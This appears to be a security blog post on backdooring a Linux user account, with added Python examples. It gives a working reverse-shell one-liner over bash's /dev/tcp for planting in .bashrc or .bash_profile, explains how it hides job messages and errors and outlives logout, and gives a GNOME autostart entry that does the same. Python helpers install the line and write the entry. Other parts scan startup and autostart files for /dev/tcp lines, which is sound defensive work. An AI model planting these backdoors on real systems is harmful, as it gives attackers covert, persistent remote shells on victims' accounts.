Tuesday, March 31, 2015

Bash backdoor

We have write access to a user's home directory and want a shell as that user.  Bash sources a few files on startup, depending on how it was invoked:

.bash_profile -> login shell (ssh, console login)
.bashrc -> interactive non-login shell (a new bash in a gnome-terminal)

On most distributions the stock .bash_profile sources .bashrc, so a line in .bashrc fires in both cases.

Adding the following line to either file launches a connect-back shell every time that file is sourced:
(setsid bash 1>&/dev/tcp/${HOST}/${PORT} 0>&1 & ) 2>/dev/null
Substitute real values for ${HOST} and ${PORT}, matching your nc -lvp ${PORT} listener.  Left as written, the unset variables expand to nothing and the connect fails silently.

setsid(1) runs bash in a new session.  A process in a new session has no controlling terminal and is outside the login shell's process group, so the SIGHUP sent when the terminal goes away never reaches it, and the backdoor keeps running after the parent bash exits.

Running the command in a subshell (the parentheses) keeps the background job out of the interactive shell's job table, so the user never sees the "[1] 1234" and "[1]+ Done" job-control messages.  The 2>/dev/null on the subshell hides any error, such as the TCP connect failing when no listener is up.

Only stdin and stdout are redirected explicitly, yet the launched bash's stderr also ends up on the TCP connection.  Bash arranges that itself: when the operand of >& is a file name rather than a descriptor number, bash treats the redirection as >word 2>&1 (the same as &>word), so stdout and stderr both go to the socket.
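As an added example, not code from the post: a Python 3 script that renders the one-liner for a given listener, appends it to a startup file only if it is not already there, and, for the defender's side, scans a home directory's bash startup files for anything that touches bash's /dev/tcp or /dev/udp pseudo-files.  The file list, the 192.0.2.10:4444 listener (a TEST-NET-1 address) and the sample .bashrc are constructed for the demo.

```python
import os
import re
import tempfile

# Bash startup files an interactive or login shell may read.  .bash_login and
# .profile are included because bash falls back to them when .bash_profile is
# absent.  (Assumed list for this demo; the post names only the first and last.)
STARTUP_FILES = (".bash_profile", ".bash_login", ".profile", ".bashrc")

# Any startup line that opens bash's /dev/tcp or /dev/udp pseudo-files deserves
# a look; this is the pattern the scanner flags.
NET_REDIRECT = re.compile(r"/dev/(tcp|udp)/")


def backdoor_line(host, port):
    """The post's one-liner with ${HOST} and ${PORT} filled in."""
    return "(setsid bash 1>&/dev/tcp/%s/%d 0>&1 & ) 2>/dev/null" % (host, int(port))


def install_startup_line(rc_path, line):
    """Append `line` to rc_path once; return True if it was added this time."""
    if os.path.exists(rc_path):
        with open(rc_path) as f:
            if any(existing.rstrip("\n") == line for existing in f):
                return False
    with open(rc_path, "a") as f:
        f.write(line + "\n")
    return True


def scan_startup_files(home):
    """Return (file, lineno, text) for every /dev/tcp or /dev/udp reference."""
    hits = []
    for name in STARTUP_FILES:
        path = os.path.join(home, name)
        if not os.path.isfile(path):
            continue
        with open(path) as f:
            for lineno, text in enumerate(f, 1):
                if NET_REDIRECT.search(text):
                    hits.append((name, lineno, text.rstrip("\n")))
    return hits


def demo():
    """Constructed scenario in a throwaway HOME: install, re-install, scan."""
    home = tempfile.mkdtemp()
    rc = os.path.join(home, ".bashrc")
    with open(rc, "w") as f:
        f.write("# constructed sample .bashrc\nalias ll='ls -l'\n")
    line = backdoor_line("192.0.2.10", 4444)   # assumed listener
    first = install_startup_line(rc, line)      # True: appended
    second = install_startup_line(rc, line)     # False: already present
    return first, second, scan_startup_files(home)


if __name__ == "__main__":
    for hit in demo()[2]:
        print("%s:%d: %s" % hit)
```

The scanner is deliberately narrow; a real audit would also grep for base64 decodes, curl|sh and the like, but /dev/tcp is the specific tell for this technique.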

Replacing bash with Meterpreter might be worthwhile: Metasploit handles multiple sessions, while this needs one netcat listener per shell.

Originally, I open-coded a minimal daemon implementation in C. Then I rewrote to use the daemon(3) library call.  Then I tried just using setsid(2) at which point I found the setsid(1) utility.  That's much better than needing an additional program.  Python or Perl may provide a means to call setsid(2) and then exec(3) the shell without requiring an additional binary.  Something like:
$ cat ./setsid.py
#!/usr/bin/env python
import errno
import os
import sys

# setsid(2) puts the caller in a new session with no controlling terminal.
# It fails with EPERM when the caller is already a process group leader,
# which a foreground job under an interactive shell's job control is; in
# that case the exec below still happens, but in the old session.
try:
    os.setsid()
except OSError as e:
    if e.errno != errno.EPERM:
        raise
# Replace this process with the requested command (argv[1] and its arguments).
os.execvp(sys.argv[1], sys.argv[1:])
$ ./setsid.py bash
$ ps
  PID TTY          TIME CMD
 9912 pts/2    00:00:00 bash
10189 pts/2    00:00:00 bash
10262 pts/2    00:00:00 ps
nohup(1) gets a similar effect by a different route: setsid moves the process into another session, so the terminal's hangup never reaches it, while nohup leaves the process where it is but makes it ignore SIGHUP.  One caveat on the script: setsid(2) fails with EPERM if the caller is already a process group leader, and a foreground job started from an interactive shell is one.  A successful setsid also drops the controlling terminal, so ps would report the new bash's TTY as ?; both bash processes still listed on pts/2 above is what you would expect when the call failed and was swallowed.  setsid(1) checks for this and forks first when it finds itself a group leader, which is why the one-liner works regardless.
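setsid(2) refuses with EPERM when the caller is already a process group leader, which is the state a foreground job started from an interactive shell is in.  The following Python 3 snippet is an added illustration, not the post's script: it forks a child, optionally makes it a group leader first, has it call setsid(2), and reports the session id before and after.  The fork_first flag does what setsid(1) does, fork once more so the process that calls setsid(2) is not a leader.  Function and field names are this example's own.

```python
import errno
import os


def try_setsid(as_group_leader, fork_first=False):
    """Fork a child that calls setsid(2) and report what happened.

    as_group_leader: first make the child a process-group leader, the state a
                     foreground job under an interactive shell is in.
    fork_first:      mimic setsid(1): fork once more so the process calling
                     setsid(2) is not a leader.
    Returns a dict: error ('' or an errno name), pid of the process that
    called setsid(2), and its session id before and after the call.
    """
    r, w = os.pipe()
    child = os.fork()
    if child == 0:
        os.close(r)
        if as_group_leader:
            os.setpgid(0, 0)                    # pgid == pid from here on
        if fork_first and os.getpgrp() == os.getpid():
            grandchild = os.fork()
            if grandchild != 0:                 # the leader waits and exits
                os.waitpid(grandchild, 0)
                os._exit(0)
        before = os.getsid(0)
        error = ""
        try:
            os.setsid()
        except OSError as e:
            error = errno.errorcode.get(e.errno, str(e.errno))
        report = "%s %d %d %d\n" % (error or "-", os.getpid(), before, os.getsid(0))
        os.write(w, report.encode())
        os._exit(0)
    os.close(w)
    chunks = []
    while True:                                 # read until every writer is gone
        data = os.read(r, 4096)
        if not data:
            break
        chunks.append(data)
    os.close(r)
    os.waitpid(child, 0)
    error, pid, before, after = b"".join(chunks).decode().split()
    return {"error": "" if error == "-" else error, "pid": int(pid),
            "sid_before": int(before), "sid_after": int(after)}


if __name__ == "__main__":
    print("not a leader:      ", try_setsid(False))
    print("leader:            ", try_setsid(True))
    print("leader, fork first:", try_setsid(True, fork_first=True))
```

In the successful cases the new session id equals the caller's pid, which is the definition of a session leader; in the EPERM case the session id is unchanged and the process is still attached to whatever terminal its parent had.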

You can also backdoor the Gnome login with the following.  Tested on Fedora 21 with Gnome 3.14; it may also work on other freedesktop.org-compliant desktops.  setsid isn't needed, since the backdoor bash process ends up in its own session and persists after the user logs out.  Maybe it's the combination of 'bash -c' using a subshell to run the backdoor bash?  'bash -c' is used to allow the file descriptor redirection: the Exec= value is not run through a shell (the desktop-entry spec splits it into arguments itself), so the redirection needs a shell of its own.  I doubted redirection would work if specified directly on the Exec= line, but did not test.
.config/autostart/backdoor.desktop

[Desktop Entry]
Type=Application
Exec=bash -c '(bash 1>&/dev/tcp/${HOST}/${PORT} 0>&1 & ) 2>/dev/null'
Name=Bash Backdoor
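An added Python 3 example, not from the post: it writes the autostart entry above under a given home directory, then parses every ~/.config/autostart/*.desktop with configparser and returns the entries whose Exec= line opens /dev/tcp or /dev/udp.  Interpolation is switched off because Exec= lines legitimately contain % field codes such as %U, and optionxform is reset so Exec and Name keep their case.  The benign editor entry and the 192.0.2.10:4444 listener are constructed for the demo.

```python
import configparser
import os
import re
import tempfile

NET_REDIRECT = re.compile(r"/dev/(tcp|udp)/")

# The entry from the post, with the listener filled in.
DESKTOP_TEMPLATE = """[Desktop Entry]
Type=Application
Exec=bash -c '(bash 1>&/dev/tcp/{host}/{port} 0>&1 & ) 2>/dev/null'
Name=Bash Backdoor
"""


def autostart_entry(host, port):
    return DESKTOP_TEMPLATE.format(host=host, port=int(port))


def write_autostart(home, basename, text):
    """Create ~/.config/autostart/<basename>.desktop; return its path."""
    directory = os.path.join(home, ".config", "autostart")
    os.makedirs(directory, exist_ok=True)
    path = os.path.join(directory, basename + ".desktop")
    with open(path, "w") as f:
        f.write(text)
    return path


def scan_autostart(home):
    """Return (file, Name, Exec) for every autostart entry whose Exec= line
    touches /dev/tcp or /dev/udp.  Entries without a [Desktop Entry] group
    are skipped, as a desktop would skip them."""
    directory = os.path.join(home, ".config", "autostart")
    hits = []
    if not os.path.isdir(directory):
        return hits
    for filename in sorted(os.listdir(directory)):
        if not filename.endswith(".desktop"):
            continue
        cp = configparser.ConfigParser(interpolation=None)
        cp.optionxform = str              # keep Exec/Name case as written
        cp.read(os.path.join(directory, filename))
        if not cp.has_section("Desktop Entry"):
            continue
        command = cp.get("Desktop Entry", "Exec", fallback="")
        if NET_REDIRECT.search(command):
            name = cp.get("Desktop Entry", "Name", fallback="")
            hits.append((filename, name, command))
    return hits


def demo():
    """Constructed scenario: one benign entry, one backdoor, then scan."""
    home = tempfile.mkdtemp()
    write_autostart(home, "editor",
                    "[Desktop Entry]\nType=Application\nExec=gedit %U\nName=Editor\n")
    write_autostart(home, "backdoor", autostart_entry("192.0.2.10", 4444))
    return scan_autostart(home)


if __name__ == "__main__":
    for filename, name, command in demo():
        print("%s (%s): %s" % (filename, name, command))
```

The same scan belongs in a user-level persistence sweep alongside the bash startup files and systemd --user units: autostart entries need no root and are rarely looked at.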
